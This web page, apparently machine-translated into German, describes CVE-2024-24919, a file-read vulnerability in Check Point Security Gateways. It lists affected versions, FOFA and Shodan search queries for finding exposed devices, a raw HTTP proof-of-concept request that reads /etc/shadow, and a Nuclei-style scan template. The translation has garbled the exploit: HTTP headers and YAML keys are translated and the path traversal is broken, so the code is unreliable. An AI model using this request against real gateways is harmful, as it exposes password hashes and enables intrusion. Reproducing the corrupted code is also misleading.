Check-Point Security Gateway Sicherheitslücke beim Lesen beliebiger Dateien (CVE-2024-24919)
Beschreibungen
Check Point Security Gateways ist eine Familie von Netzwerksicherheitslösungen von Check Point Software. Diese Lösungen, zu denen Next Generation Firewalls (NGFW), Data Centre Security Gateways und KI-gestützte Quantum Gateways gehören, wurden entwickelt, um Unternehmen einen fortschrittlichen Schutz vor komplexen Cyber-Bedrohungen zu bieten. Sie sichern Netzwerke, Clouds, mobile Geräte und Endpunkte mit integriertem Bedrohungsschutz, einheitlichem Sicherheitsmanagement und Richtlinienkontrolle.
fofa
icon_hash="1440532452″
Betroffene Versionen
Check Point Sicherheits-Gateways R77.20 (EOL)
Check Point Sicherheits-Gateways R77.30 (EOL)
Check Point Sicherheits-Gateways R80.10 (EOL)
Check Point Sicherheits-Gateways R80.20 (EOL)
Check Point Sicherheits-Gateways R80.20.x
Check Point Sicherheits-Gateways R80.20SP (EOL)
Check Point Sicherheits-Gateways R80.30 (EOL)
Check Point Sicherheits-Gateways R80.30SP (EOL)
Check Point Sicherheits-Gateways R80.40 (EOL)
Check Point Sicherheits-Gateways R81
Check Point Sicherheits-Gateways R81.10
Check Point Sicherheits-Gateways R81.10.x
Check Point Sicherheits-Gateways R81.20
poc
POST /Clients/MyCRL HTTP/1.1
Rechner: ip
Inhalt-Länge: 39aCSHELL/... /... /... /... /... /... /... /etc/shadow
poc yaml
id: CVE-2024-24919
Infos.
Name: Check Point Quantum Gateway - Offenlegung von Informationen
Autor: johnk3r
Schweregrad: hoch
Beschreibung: |
CVE-2024-24919 ist eine Sicherheitslücke in Bezug auf die Offenlegung von Informationen, die es einem Angreifer ermöglichen kann, auf bestimmte Informationen auf mit dem Internet verbundenen Gateways die mit IPSec VPN, Remote Access VPN oder Mobile Access Software Blade konfiguriert wurden.
Hinweis.
- https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
- https://support.checkpoint.com/results/sk/sk182337
Metadaten.
max-Anfrage: 1
Anbieter: Checkpoint
Produkt: quantum_security_gateway
cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*:*:*:*:*:*:*
shodan-query: html: "Check Point SSL-Netzwerk"
verifiziert: wahr
Tags: cve,cve2024,Kontrollpunkt,lfihttp.
- roh.
– |
POST /Clients/MyCRL HTTP/1.1
Host: {{Hostname}}aCSHELL/... /... /... /... /... /... /... /etc/shadow
Matcher-Bedingung: und
übereinstimmen.
- Typ: Regex
Teil: Körper
regex.
- "root:"
- "niemand:"
Bedingung: und- Typ: Status
Status.
– 200
Kommentare
Kommentar hinzufügen-
Kommentarliste ist leer